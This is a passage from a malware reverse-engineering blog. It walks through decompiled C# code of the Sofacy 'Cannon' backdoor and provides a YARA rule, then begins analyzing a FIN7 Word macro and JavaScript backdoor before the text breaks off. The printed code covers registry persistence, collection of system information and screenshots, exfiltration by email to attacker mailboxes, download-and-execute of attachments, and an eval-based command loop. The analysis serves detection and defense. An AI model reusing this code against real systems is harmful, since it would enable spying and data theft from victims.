November 2018 – Reverse Engineering, Malware Deep Insight

Let’s Learn: In-Depth on Sofacy Cannon Loader/Backdoor Review

Goal: Review and practice analyzing C# code from the Sofacy Group new loader/backdoor called “Cannon” (as discovered by Palo Alto Unit 42 researchers).

New #Unit42 research: #Sofacy continues global attacks and wheels out new ‘Cannon’ Trojan. Get the full report https://t.co/9ebNJ2x6aY pic.twitter.com/07b85lWiLh

— Unit 42 (@Unit42_Intel) November 20, 2018

https://platform.twitter.com/widgets.js Source:

Sofacy “Cannon” Loader/Backdoor

SHA256: 61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e

Outline:

I. Background & Summary
II. Cannon Classes
III. Cannon "Form1" Main Functions
A. “start_Tick”
B. “inf_Tick”
C. “txt_Tick”
D. “subject_Tick”
E. "run_Tick"
F. “load_Tick”
G. “screen_Tick”
H. "eTim_Tick"
IV. Yara Signature

I. Background & Summary

Before diving deeper, I highly recommend reading the original discovery and excellent research related to the “Cannon” malware by Palo Alto Unit 42 titled “Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan.” As reported by Unit 42, Sofacy group leveraged malicious Microsoft Document themed as “Lion Air disaster” to deliver the Cannon malware. By and large, according to Palo Alto Unit 42, Sofacy recent targeting includes “government organizations in the EU, US, and former Soviet states.”
Cannon is a rather simple but interesting C#-coded malware collecting victim information, receiving commands (controlled by EventHandler), and retrieving next stage via the SMTPS and POP3S. It is interesting that the malware original project “wsslc” program database (PDB) is associated with the possible user “Garry” with the “cannon” project path “C:\Users\Garry\Desktop\cannon\obj\x86\Debug\wsslc.pdb”. Notably, “Garry” is a common way for Russian speakers to phonetically spell out “Harry” stressing the “G” sound. The malware logic also checks for control email messages attachment files containing “auddevc” via its “load_Tick” function possibly retrieving unidentified additional binaries. If found, the malware creates a file stream in the main directory and writes the file to the directory using BinaryWriter. Additionally, the malware creates a registry entry as “Shell” in “Winlogon” via “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon” for registry persistence.
It is also interesting that the malware authors chose to leverage Czech email provider @post.cz for communications and command control.

II. Cannon Classes
The binary contains the following five classes as follows:

Class Name	Description
AUTH	Initializes values for SMTPS and POP connection mF1, p1, mF2, p2, mF3, and p3
Form1	Loads the main functions and initializes the main flow of the binary
Lenor	Loads auxiliary functions, retrieves information about victims and parses emails for commands
MDat	Initializes values used for network communication
Program	Starts the program and passes control to Form1

The main program starts running the Main function which checks whether the specified file “C:\Users\Public\Music\s.txt” exists, if yes, it starts “explorer.exe” If not, it sets up the EnableVisualStyles() and SetCompatibleTextRenderingDefault(defaultValue: false) and launches the “Run” command the command executing the “Form1” class.

The full function is as follows:

////////////////////////////////////////////////////////////////////
////////////////////// Cannon Malware Main "Program" ///////////////
////////////////////////////////////////////////////////////////////
internal static class Program
{
  [STAThread]
   private static void Main()
 {
  try
  {
   if (File.Exists("C:\\Users\\Public\\Music\\s.txt"))
           {
            Process.Start("explorer.exe");
           }
    Application.EnableVisualStyles();
    Application.SetCompatibleTextRenderingDefault(defaultValue: false);
    Application.Run(new Form1());
   }
  catch (Exception)
  {
  }
 }
}

III. Cannon “Form1” Main Functions
Next, the class “Form1” starts with InitializeComponent(), which sets up all the variables and intervals with EventHandler for the main functions as detailed by Unit 42:

////////////////////////////////////////////////////////////////////
// Cannon Malware Sequence "Form1" Calls & Intervals //////////////
///////////////////////////////////////////////////////////////////
start.Interval = 1000;
start.Tick += new System.EventHandler(start_Tick);
inf.Interval = 300000;
inf.Tick += new System.EventHandler(inf_Tick);
txt.Interval = 120000;
txt.Tick += new System.EventHandler(txt_Tick);
subject.Interval = 120000;
subject.Tick += new System.EventHandler(subject_Tick);
run.Interval = 60000;
run.Tick += new System.EventHandler(run_Tick);
load.Interval = 120000;
load.Tick += new System.EventHandler(load_Tick);
screen.Interval = 10000;
screen.Tick += new System.EventHandler(screen_Tick);
eTim.Interval = 13000;
eTim.Tick += new System.EventHandler(eTim_Tick);

A. “start_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "start_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void start_Tick(object sender, EventArgs e)
{
 try
 {
 start.Enabled = false;
 Lenor lenor = new Lenor();
 if (Directory.Exists("C:\\Users\\Public\\Music")
 {
  dir = "C:\\Users\\Public\\Music" + "\\"; 
 }
 else
 {
  dir = "C:\\Documents and Settings\\All Users\\Documents" + "\\"; 
 } 
 att = dir + "auddevc.txt";
 _id = lenor.id(dir);
 if (!File.Exists(dir + "s.txt"))
 {
  lenor.Dir = dir;
  lenor.Registration("\"HKCU\\Software\\Microsoft\\" + 
                "Windows NT\\CurrentVersion\\Winlogon\", "Shell");
  File.WriteAllText(dir + "s.txt", "{SysPar = 65}");
 }
 inf.Enabled = true;
 }
 catch (Exception)
 {
 }
}

The “start_Tick” function checks if the application is launched with the interval of 1000 milliseconds or 1 second. The function checks if the directory “C:\Users\Public\Music” exists if not it uses the “C:\Documents and Settings\All Users\Documents” one.
Then, it concatenates the filename to the path as “auddevc.txt”. The function generates a bot ID (_id) leveraging the id function from the “Lenor” class (which calls another “SN” function from Lenor). The bot ID is generated by concatenating the results of the cmd command for volume name “vol C:” with machine username “Environment.UserName”. More specifically, the “Lenor.SN” function runs a command, for example, “vol C:>> C:\\Documents and Settings\\All Users\\Documents\99.txt” saving the output to a local file “99.txt” which is run via batch script “b.bat”; both files are removed right after the operation.

The “Lenor._id” function simply leverages the SN function and concatenates the full bot ID.

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "Id" Bot ID Generation /////////////
////////////////////////////////////////////////////////////////////
public string id("C:\\Documents and Settings\\All Users\\Documents")
{
 string text = "";
 string text2 = "";
 string text3 = "";
 string text4 = "";
 volumename = SN("C:\\Documents and Settings\\All Users\\Documents", "C");
 volumename = volumename.Trim();
 username = Environment.UserName;
 byte[] bytes = Encoding.Default.GetBytes(text4);
 text4 = BitConverter.ToString(bytes);
 username = text4.Replace("-", "");
 full_id = volumename + username;

/*
public string SN(string "C:\\Documents and Settings\\All Users\\Documents", string name)
{
string text = "";
try
{
 while (!File.Exists("C:\\Documents and Settings\\All Users\\Documents" + "\\99.txt"))
 {
 try
 {
 string contents = "vol " + 
 "C" + ":>>" + "C:\\Documents and Settings\\All Users\\Documents" + "\\99.txt";
 File.WriteAllText("C:\\Documents and Settings\\All Users\\Documents" + "\\b.bat", contents);
 ProcessStartInfo processStartInfo = new ProcessStartInfo();
 processStartInfo.FileName = d + "\\b.bat";
 processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
 Process.Start(processStartInfo);
 File.Delete(d + "\\b.bat");
 }
 catch (Exception)
 {
 }
 }
 text = File.ReadAllText(d + "\\99.txt");
 string[] array = text.Split('\n');
 text = array[1];
 text = text.Substring(text.LastIndexOf(" "));
 text = text.Remove(text.IndexOf('-'), 1);
 File.Delete(d + "\\99.txt");
}
catch (Exception)
{
}
return text;
}
*/

For persistence, the malware checks if the directory contains “s.txt” file. If not, it registers itself in the following registry path:

HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\Shell

It also creates the file “s”.txt in the same local directory with “{SysPar = 65}” encoding.
B. “inf_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "inf_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void inf_Tick(object sender, EventArgs e)
{
 try
 {
 inf.Enabled = false;
 string[] array = "REDACTED_PASS2|bishtr.cam47".Split('|');
 a1 = array[1];
 b1 = array[0];
 array = "REDACTED_PASS3|cervot.woprov".Split('|');
 a2 = array[1];
 b2 = array[0];
 array = "REDACTED_PASS4|lobrek.chizh".Split('|');
 a3 = array[1];
 b3 = array[0];
 Lenor lenor = new Lenor();
 lenor.Dir = dir;
 File.Delete(dir + "\\b.bat");
 string userName = Environment.UserName;
 lenor.inf(dir + "i.ini", userName);
 MDat mDat = new MDat();
 mDat.Dom = "@post.cz";
 mDat.Host = "smtp.seznam.cz";
 mDat.fn = dir + "i.ini"; //filename attachement
 mDat.ID = _id; //subject
 mDat.bod = "S_inf"; // body
 mDat.mT = "sahro.bella7"; // to
 AUTH aUTH = new AUTH();
 aUTH.mF1 = a1; // from bishtr.cam47
 aUTH.p1 = b1;  // REDACTED_PASS2
 aUTH.mF2 = a2; // from cervot.woprov
 aUTH.p2 = b2;  // REDACTED_PASS3
 aUTH.mF3 = a3; // from lobrek.chizh
 aUTH.p3 = b3;  // REDACTED_PASS4
 lenor.sent(mDat, aUTH);
 screen.Enabled = true;
 }
 catch (Exception)
 {
 screen.Enabled = true;
 }
}

The “inf_Tick” function checks if the application is launched with the interval of 30000 milliseconds or 30 seconds. The function splits strings via “|” separator such as for example “REDACTED_PASS2|bishtr.cam47”.Split(‘|’) and adds the values as usernames and passwords to the authentication “AUTH” class.
Additionally, it deletes the batch file “b.bat” from the current directory.
The malware “lenor.inf” function works as follows:

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "inf" Function Fragment /////////////
////////////////////////////////////////////////////////////////////
public string inf(string fn, string CurU)
{
 string text = "";
 StringBuilder stringBuilder = new StringBuilder();
 stringBuilder.AppendFormat("RPlace:\n" + Environment.NewLine);
 stringBuilder.AppendFormat("{0} \n", Application.ExecutablePath + Environment.NewLine);
 stringBuilder.AppendFormat("===================================================================================\n"
 + Environment.NewLine);
 stringBuilder.AppendFormat("OS:  {0}\n", Environment.OSVersion + Environment.NewLine);
 stringBuilder.AppendFormat("SDir:  {0}\n", SDir() + Environment.NewLine);
 stringBuilder.AppendFormat("Domain:  {0}\n", Domain() + Environment.NewLine);
 stringBuilder.AppendFormat("Host: {0}\n", HostN() + Environment.NewLine);
 stringBuilder.AppendFormat("CurrentUsr: {0}\n", CurU + Environment.NewLine);
 stringBuilder.AppendFormat("TimeZ: {0}\n", GetTZ() + Environment.NewLine);
 stringBuilder.AppendFormat("Working: {0}\n", TimeWork() + Environment.NewLine);
 stringBuilder.AppendFormat("===================================================================================\n" 
+ Environment.NewLine);
 stringBuilder.AppendFormat("\n" + DrvDsk() + Environment.NewLine);
 stringBuilder.AppendFormat("===================================================================================\n" 
+ Environment.NewLine);
 stringBuilder.AppendFormat("Swr:\n" + Environment.NewLine);
 text = "C:\\Program";
 string[] directories = Directory.GetDirectories(text + " Files\\");
 string[] array = directories;
 foreach (string str in array)
 {
 stringBuilder.AppendFormat("{0}\n", str + Environment.NewLine);
 }
 if (Directory.Exists(text + " Files (x86)\\"))
 {
 directories = Directory.GetDirectories(text + " Files (x86)\\");
 array = directories;
 foreach (string str in array)
 {
  stringBuilder.AppendFormat("{0}\n", str + Environment.NewLine);
 }
 }
 stringBuilder.AppendFormat("===================================================================================\n" 
+ Environment.NewLine);
 stringBuilder.AppendFormat("PrL:\n" + Environment.NewLine);

The malware function utilizes “Lenor.inf” function to write the collected victim information to the file in the same directory as “i.ini” in the following structure (example):

The function attempts to authenticate to the three @post.cz email addresses (“bishtr.cam47@post.cz”, “cervot.woprov@post.cz”, “lobrek.chizh@post.cz”) send the information to “sahro.bella7@post.cz” with the body message “S_inf” with the file attachment “i.ini” with the subject as the bot ID.
C. “txt_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "txt_Tick"  function ////////////////
////////////////////////////////////////////////////////////////////
private void txt_Tick(object sender, EventArgs e)
{
 try
{
 txt.Enabled = false;
 string[] array = "REDACTED_PASSWORD|trala.cosh2".Split('|');
 ai = array[1];
 bi = array[0];
 Lenor lenor = new Lenor();
 _adr = lenor.pi(_id, "trala.cosh2" + "@post.cz", bi, "pop.seznam.cz");
 if (_adr.Length > 0)
 {
  MDat mDat = new MDat();
  mDat.Dom = "@post.cz";
  mDat.Host = "smtp.seznam.cz";
  mDat.fn = dir + "s.txt";
  mDat.ID = _id;
  mDat.bod = "ok";
  mDat.mT = "sahro.bella7";
  AUTH aUTH = new AUTH();
  aUTH.mF1 = a1;
  aUTH.p1 = b1;
  aUTH.mF2 = a2;
  aUTH.p2 = b2;
  aUTH.mF3 = a3;
  aUTH.p3 = b3;
  lenor.sent(mDat, aUTH);
  load.Enabled = true;
 }
 else
 {
  txt.Enabled = true;
 }
 }
 catch (Exception)
{
 load.Enabled = true;
}
}

The “txt_Tick” function is launched with the interval of 120000 milliseconds or 120 seconds.The function sets up variables and splits username and password leveraging “|” as follows:
“REDACTED_PASS|trala.cosh2”.
The function “lenor.pi” authenticates to the email account “trala.cosh2@post.cz” and retrieves messages via pop3Client.GetMessageCount() for the message looping over subjects with the bot ID (message.Headers.Subject == ID) and retrieving message body message.MessagePart.Body and converting text (BitConverter.ToString(body)) to string and decoding hex via FromHex(text) and deleting the message.
The loop code is as follows:

/////////////////////////////////////////////////////////////////////
// Cannon Malware "txt_Tick" Command Email GetMessage Loop for cmd //
////////////////////////////////////////////////////////////////////
for (int i = 0; i < pop3Client.GetMessageCount(); i++)
{
  message = pop3Client.GetMessage(i + 1);
  if (message.Headers.Subject == ID)
   {
    byte[] body = message.MessagePart.Body;
    text = BitConverter.ToString(body);
    text = FromHex(text);
    pop3Client.DeleteMessage(i + 1);
   }
}

If the text length is over zero, the function attempts to authenticate to the two aforementioned @post.cz email addresses from “screen_Tick” and send the information to “sahro.bella7@post.cz” with the body message “ok” with the file attachment “s.txt” with the subject as the bot ID.
D. “subject_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "subject_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void subject_Tick(object sender, EventArgs e)
{
 try
 {
 subject.Enabled = false;
 Lenor lenor = new Lenor();
 lenor.Dir = dir;
 rn = lenor.pi(_id, "trala.cosh2" + "@post.cz", bi, "pop.seznam.cz";);
 rn = rn.Trim();
 if (rn.Length > 0)
 {
  MDat mDat = new MDat();
  mDat.Dom = "@post.cz";
  mDat.Host = "smtp.seznam.cz";
  mDat.fn = dir + "s.txt";
  mDat.ID = _id;
  mDat.bod = "ok3";
  mDat.mT = "sahro.bella7";
  AUTH aUTH = new AUTH();
  aUTH.mF1 = a1;
  aUTH.p1 = b1;
  aUTH.mF2 = a2;
  aUTH.p2 = b2;
  aUTH.mF3 = a3;
  aUTH.p3 = b3;
  lenor.sent(mDat, aUTH);
  run.Enabled = true;
 }
 else
 {
  subject.Enabled = true;
 }
 }
 catch (Exception)
 {
 }
 }

The “subject_Tick” function is launched with the interval of 120000 milliseconds or 120 seconds. The function sets up variables and splits username and password leveraging “|” as follows:
“REDACTED_PASS|trala.cosh2”
If the text length is over zero and trimmed of leading and trailing whitespace characters, the function attempts to authenticate to the two aforementioned @post.cz email addresses from “screen_Tick” and send the information to “sahro.bella7@post.cz” with the body message “ok3” with the file attachment “s.txt” with the subject as the bot ID.

E. “run_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "run_Tick" function /////////////////
////////////////////////////////////////////////////////////////////
private void run_Tick(object sender, EventArgs e)
{
 try
 {
  run.Enabled = false;
  try
  {
 Directory.CreateDirectory(rn.Substring(0, rn.LastIndexOf("\\")));
  }
  catch (Exception)
  {
  }
 File.Move(att, rn);
 if (File.Exists(rn))
 {
 Lenor lenor = new Lenor();
 MDat mDat = new MDat();
 mDat.Dom = "@post.cz";
 mDat.Host = "smtp.seznam.cz";
 mDat.fn = dir + "l.txt";
 mDat.ID = _id;
 mDat.bod = "ok4";
 mDat.mT = "sahro.bella7";
 AUTH aUTH = new AUTH();
 aUTH.mF1 = a1;
 aUTH.p1 = b1;
 aUTH.mF2 = a2;
 aUTH.p2 = b2;
 aUTH.mF3 = a3;
 aUTH.p3 = b3;
 lenor.sent(mDat, aUTH);
 Process.Start(rn);
 Process[] processes = Process.GetProcesses();
 Process[] array = processes;
 foreach (Process process in array)
 {
  if (process.ProcessName.Contains("auddevc"))
  {
   Lenor lenor2 = new Lenor();
   MDat mDat2 = new MDat();
   mDat2.Dom = "@post.cz";
   mDat2.Host = "smtp.seznam.cz";
   mDat2.fn = dir + "s.txt";
   mDat2.ID = _id;
   mDat2.bod = "ok5";
   mDat2.mT = "sahro.bella7";
   AUTH aUTH2 = new AUTH();
   aUTH2.mF1 = a1;
   aUTH2.p1 = b1;
   aUTH2.mF2 = a2;
   aUTH2.p2 = b2;
   aUTH2.mF3 = a3;
   aUTH2.p3 = b3;
   lenor2.sent(mDat2, aUTH2);
   File.Delete(dir + "sysscr.ops");
   File.Delete(dir + "i.ini");
   Application.Exit();
  }
 }
 }
 else
 {
  Application.Restart();
 }
 }
 catch (Exception)
 {
 Application.Exit();
 }
}

The “run_Tick” function is launched with the interval of 60000 milliseconds or 60 seconds. The function processes the return text of the “subject_Tick” command and creates a directory with its path.

Then, if successful, it attempts to move the file “auddevc.txt” to the new directory via File.Move(dir + “auddevc.txt”), rn).

If successful, the function attempts to authenticate to the two aforementioned @post.cz email addresses and send the information to “sahro.bella7@post.cz” with the body message “ok4” with the file attachment “l.txt” with the subject as the bot ID.

Additionally, the function checks if the running process contains the name “auddevc,” if yes, the function attempts to authenticate to the two aforementioned @post.cz email addresses and send the information to “sahro.bella7@post.cz” with the body message “ok5” with the file attachment “s.txt” with the subject as the bot ID.

The function is also responsible for deleting the saved screenshot “sysscr.ops” and the collected victim information file “i.ini.” The function also exists the application if successful.

F. “load_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "load_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void load_Tick(object sender, EventArgs e)
{
try
 {
 load.Enabled = false;
 string text = _adr.Replace("B&", "");
 text = text.Replace("Db", "");
 string[] array = text.Split('%');
 string text2 = array[0];
 string text3 = array[1];
 text2 = text2.Trim();
 text3 = text3.Trim();
 Lenor lenor = new Lenor();
 lenor.Dir = dir;
 File.WriteAllText(dir + "l.txt", "090");
 rn = lenor.piatt(_id, text3 + "@post.cz", text2, "pop.seznam.cz";);
 if (File.Exists(att))
 {
  MDat mDat = new MDat();
  mDat.Dom = "@post.cz";
  mDat.Host = "smtp.seznam.cz";
  mDat.fn = dir + "l.txt";
  mDat.ID = _id;
  mDat.bod = "ok2";
  mDat.mT = "sahro.bella7";
  AUTH aUTH = new AUTH();
  aUTH.mF1 = a1;
  aUTH.p1 = b1;
  aUTH.mF2 = a2;
  aUTH.p2 = b2;
  aUTH.mF3 = a3;
  aUTH.p3 = b3;
  lenor.sent(mDat, aUTH);
  subject.Enabled = true;
 }
 else
 {
  load.Enabled = true;
 }
 }
 catch (Exception)
 {
 }
}

The “load_Tick” function is launched with the interval of 120000 milliseconds or 120 seconds. The function is responsible for processing the retrieved text from “txt_Tick” function. It replaces the “B&” with “”, “Db” with “”, then splits the text via ‘%’ and removes trailing whitespace.
Then, it writes the new file “l.txt” from this text in the same directory with “090” encoding.
The function “lenor.piatt” authenticates to the email account “trala.cosh@post.cz” and retrieves messages via pop3Client.GetMessageCount() for the message looping over subjects with the bot ID (message.Headers.Subject == ID) and retrieving message body message.MessagePart.Body and converting text (BitConverter.ToString(body)) to string and decoding hex via FromHex(text). Then, it loops over looking for attachment files containing “auddevc”. If found, it creates a file stream in the same directory and writes it to the directory using BinaryWriter.

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "piatt" function fragment ///////////
////////////////////////////////////////////////////////////////////
if (pop3Client.GetMessageCount() > 0)
 {
 for (int i = 0; i < pop3Client.GetMessageCount(); i++)
 {
  message = pop3Client.GetMessage(i + 1);
  if (message.Headers.Subject == ID)
  {
 byte[] rawMessage = message.RawMessage;
 text = BitConverter.ToString(rawMessage);
 text = FromHex(text);
 list = message.FindAllAttachments();
 foreach (MessagePart item in list)
 {
  if (item.FileName.Contains("auddevc"))
  {
   FileStream fileStream = new FileStream(Dir + item.FileName, FileMode.Create);
   BinaryWriter binaryWriter = new BinaryWriter(fileStream);
   binaryWriter.Write(item.Body);
   binaryWriter.Close();
   fileStream.Close();
  }
 }
 pop3Client.DeleteMessage(i + 1);
 }
  }
 }

G. “screen_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "screen_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void screen_Tick(object sender, EventArgs e)
{
 try
 {
 screen.Enabled = false;
 string[] array = "REDACTED_PASS2|bishtr.cam47".Split('|');
 a1 = array[1];
 b1 = array[0];
 array = "REDACTED_PASS3|cervot.woprov".Split('|');
 a2 = array[1];
 b2 = array[0];
 array = "REDACTED_PASS4|lobrek.chizh".Split('|');
 a3 = array[1];
 b3 = array[0];
 Lenor lenor = new Lenor();
 lenor.Dir = dir;
 lenor.scr();
 MDat mDat = new MDat();
 mDat.Dom = "@post.cz";
 mDat.Host = "smtp.seznam.cz";
 mDat.fn = dir + "sysscr.ops";
 mDat.ID = _id;
 mDat.bod = "SCreen";
 mDat.mT = "sahro.bella7";
 AUTH aUTH = new AUTH();
 aUTH.mF1 = a1;
 aUTH.p1 = b1;
 aUTH.mF2 = a2;
 aUTH.p2 = b2;
 aUTH.mF3 = a3;
 aUTH.p3 = b3;
 lenor.sent(mDat, aUTH);
 txt.Enabled = true;
 }
 catch (Exception)
 {
 txt.Enabled = true;
 }
 }

The “screen_Tick” function is launched with the interval of 10000 milliseconds or 10 seconds. The function sets up variables and splits usernames and passwords leveraging “|” as follows:

REDACTED_PASS2|bishtr.cam47
REDACTED_PASS3|cervot.woprov
REDACTED_PASS4|lobrek.chizh

Then, it leverages the screen function “lenor.scr” taking a desktop screenshot via Bitmap(bounds.Width, bounds.Height), Graphics.FromImage(bitmap), graphics.CopyFromScreen(Point.Empty, Point.Empty, bounds.Size) and saving the screenshot as “.png” image masked as “sysscr.ops” in the main directory.
The function attempts to authenticate to the two aforementioned @post.cz email addresses and send the information to “sahro.bella7@post.cz” with the body message “SCreen” with the file attachment “sysscr.ops” with the subject as the bot ID.
H. “eTim_Tick”

/////////////////////////////////////////////////////////////////////
/////////////// Cannon Malware "eTim_Tick" function ////////////////
////////////////////////////////////////////////////////////////////
private void eTim_Tick(object sender, EventArgs e)
 {
  Application.Exit();
  File.Delete(dir + "\\r.bat");
 }

The “eTim_Tick” function is launched with the interval of 13000 milliseconds or 13 seconds.
The function simply exits the application and deletes the batch script “r.bat” in the directory.

IV. Yara Signature

rule apt_win32_cannon_loader_sofacy {
   meta:
      description = "Detects Sofacy Cannon Loader"
      author = "@VK_Intel"
      date = "2018-11-24"
      hash1 = "61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e"
   strings:

      $pdb = "c:\\Users\\Garry\\Desktop\\cannon\\obj\\x86\\Debug\\wsslc.pdb" fullword ascii
      $exe = "wsslc.exe" fullword ascii wide
      
      $s0 = "cannon" fullword ascii wide
      $s1 = "cannon.Form1.resources" fullword ascii wide
      $s2 = "cannon.Properties.Resources.resources" fullword ascii wide

      $c0 = "Form1" fullword ascii wide
      $c1 = "Lenor" fullword ascii wide
      $c2 = "MDat" fullword ascii wide
      $c3 = "AUTH" fullword ascii wide
      $c4 = "Program" fullword ascii wide

      $f0 = "start_Tick" fullword ascii wide
      $f1 = "inf_Tick" fullword ascii wide
      $f2 = "screen_Tick" fullword ascii wide
      $f3 = "txt_Tick" fullword ascii wide
      $f4 = "load_Tick" fullword ascii wide
      $f5 = "subject_Tick" fullword ascii wide
      $f6 = "run_Tick" fullword ascii wide
      $f7 = "eTim_Tick" fullword ascii wide

   condition:
      ( uint16(0) == 0x5a4d and
         filesize < 1000KB and
         ( 2 of ($c*) and 4 of ($f*) ) or ( 1 of ($s*) and ( $pdb or $exe ) ) 
      ) or ( all of them )
}

Let’s Learn: In-Depth Review of FIN7 VBA Macro & Lightweight JavaScript Backdoor

Goal: Review, analyze, and practice extracting FIN7 JavaScript backdoor from malicious Microsoft Office documents.

#FIN7 Not Finished – Morphisec Spots New Attack Campaign https://t.co/cPDMQ8xNra by @smgoreli and @alongros #cybersecurity

— Morphisec (@morphisec) November 21, 2018

https://platform.twitter.com/widgets.js
Source:

Microsoft Office First-Stage VBA Macro Documents:
SHA256: 6e1230088a34678726102353c622445e1f8b8b8c9ce1f025d11bfffd5017ca82
SHA256: f5f8ab9863dc12d04731b1932fc3609742de68252c706952f31894fc21746bb8

SHA256: 63ff5d9c9b33512f0d9f8d153c02065c637b7da48d2c0b6f7114deae6f6d88aa

Obfuscated Lightweight JavaScript Backdoor
Deobfuscated Lightweight JavaScript Backdoor

Outline:

I. Background & Summary
II. Malicious Microsoft Word Document First-Stage Macro
III. Deobfuscated Lightweight JavaScript Backdoor
A. “main”
B. “crypt_controller”
C. “id”
D. “get_path”
E. “send_data”
IV. Yara Signature: Possible FIN7 First-Stage Microsoft Word Document

I. Background & Summary
FIN7 group remains to be one of the most formidable financially
motivated group, which is not only known for the large point-of-sale
breaches (including the alleged latest one of Burgerville
restaurant point-of-sale network) but also for its stealthy
persistence and sophisticated and persistent approach.
I highly recommend reading Morphisec’s blog titled “FIN7 Not Finished – Morphisec Spots New Campaign,” which details one of the latest FIN7 initial Word documents first-stage loaders with the deployed JavaScript backdoor.
It is also notable that they deploy lightweight JavaScript backdoor with communication over HTTPS mimicking Content Delivery Network (CDN) domains with the added search engine strings such as Google and ing creating bing-cdn[.]com, googleapi-cdn[.]com, & cisco-cdn[.]com.

Additionally, they still leverage JavaScript backdoor via renamed “wscript.exe” as “mses.exe” with the file itself called “errors.txt.”
In their backdoor code, they have the following hardcoded groups:

Hardcoded Groups
exchange
work2
ico

The following MITREEnterprise Attack – Attack Patterns are observed with the FIN7 campaign:

+ Spearphishing Attachment - T1193
+ Scripting - T1064
+ Masquerading - T1036
+ Deobfuscate/Decode Files or Information - T1140
+ Data Obfuscation - T1001

I. Malicious Microsoft Word Document First-Stage Macro
Essentially, the Microsoft Word document loaders do not rely on any on exploits but simply require a social-engineering trick to “Enable Macros.” Notably, to avoid process whitelisting of wscript, the macro logic copies the original JavaScript execution engine “wscript.exe” as “mses.exe” in %LOCALAPPDATA% and leverages a possible anti-analysis routine of checking the system drive size via GetDrive.TotalSize of more than 2456 bytes to possibly thwart anti-sandbox check.

The actual obfuscated Javascript backdoor is stored in UserForm object, which is also written to a disc as “errors.txt” in “%TEMP%”. The final execution of the backdoor is performed via this following command:

%LOCALAPPDATA%\mses.exe //b /e:jscript %temp%\errors.txt

Once it is done, the document macro runs a message box displaying “Decryption error” via MsgBox(“Decryption error”).

It is notable that the decryption message is also part of the document social engineering ruse “to decrypt document” as well as the subsequent “Decryption Error” coupled with the execution of “errors.txt” creates a plausible yet well-thought scenario of allowing possible “error” paths due to document errors.

The full cleaned macro code is as follows:

//////////////////////////////////////////////
/////// FIN7 Deobfuscated Word Macro //////////
//////////////////////////////////////////////
Set CreateObjectScripting = CreateObject("Scripting.FileSystemObject")
Set CreateObjectWScriptShell = CreateObject("WScript.Shell")
SystemDrivePath = CreateObjectWScriptShell.ExpandEnvironmentStrings("%SystemDrive%")
Set GetDrivePath = CreateObjectScripting.GetDrive(SystemDrivePath)
DriveSize = GetDrivePath.TotalSize
If DriveSize > 2456 Then
TEMPPathErrorsTxt = CreateObjectWScriptShell.ExpandEnvironmentStrings("%temp%") \
& "\errors.txt"
FormCaptionHolder = UserForm1.NameForm.Caption
Set CreateFileHolder = CreateObjectScripting.CreateTextFile(TEMPPathErrorsTxt)
CreateFileHolder.WriteLine FormCaptionHolder
CreateFileHolder.Close
GetPathtoMsesExe = CreateObjectWScriptShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") & \
 "\mses.exe"
FileCopy "C:\\Windows\\System32\\wscript.exe", GetPathtoMsesExe
Shell "%LOCALAPPDATA%\mses.exe" & " //b /e:jscript " & "%temp%\errors.txt", False

Additionally, the second document contains the same exact reference to mysterious “cesar.exe” as detailed by Nick Carr.

#FIN7 is still active and getting in on the renamed legitimate binary trend
Why launch your JavaScript backdoor with wscript.exe when you can run it with cesar.exe?

%𝚄𝚂𝙴𝚁𝙿𝚁𝙾𝙵𝙸𝙻𝙴%\𝙲𝚘𝚗𝚝𝚊𝚌𝚝𝚜\𝚌𝚎𝚜𝚊𝚛.𝚎𝚡𝚎 //𝙴:𝚓𝚜𝚌𝚛𝚒𝚙𝚝 %𝚃𝙴𝙼𝙿%\𝚜𝚎𝚝𝚝𝚒𝚗𝚐𝚜.𝚝𝚡𝚝 pic.twitter.com/bYwcF3xoOj

— Nick Carr (@ItsReallyNick) November 6, 2018

III. Deobfuscated Lightweight JavaScript Backdoor
The JavaScript contains five functions as follows:

Function Name	Description
“main”	main function
“id”	generate unique machine ID based on MAC address and DNS domain
“crypt_controller”	control decryptor and encryptor function
“get_path”	build path URL based on pre-configured paths
“send_data”	send data request to the server

A. “main”
The “main” function initiates a variable “ncommand”, which holds the “send_data” function with the arguments
“request” and “action=get_command”, true).

//////////////////////////////////////////////
/////// JS Backdroor "main" Function /////////
//////////////////////////////////////////////
function main() {
    var ncommand = "";
    ncommand = send_data("request", "action=get_command", true);
    if (ncommand !== "no") {
        try {
            eval(crypt_controller("decrypt", ncommand));
        } catch (e) {}
    }
    var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);
    WScript.Sleep(random_knock);
    main();
}

If the ncommand does not equal “no,” it runs an eval command via “crypt_controller” functions with the arguments “decrypt” and ncommand.
The backdoor leverages the variables “random_knock,” which equals 120000 leveraging random * 16001 – 5000, which is used with the WScript.Sleep command then it runs the main command again.
The unique machine is generated via the command running Date with the getUTCMilliseconds() parameters. It also deletes itself via GetFile.Type == “Application and length == 10 and deleteFile via ActiveOXbject.
B. “crypt_controller”

The crypt_controller function accepts two parameters of type and request.

//////////////////////////////////////////////
// JS Backdroor "crypt_controller" Function //
//////////////////////////////////////////////
function crypt_controller(type, request) {
    var encryption_key = "";
    if (type === "decrypt") {
        request = decodeURIComponent(request);
        var request_split = request.split(")*(");
        request = request_split[0];
        encryption_key = request_split[1].split("");
    } else {
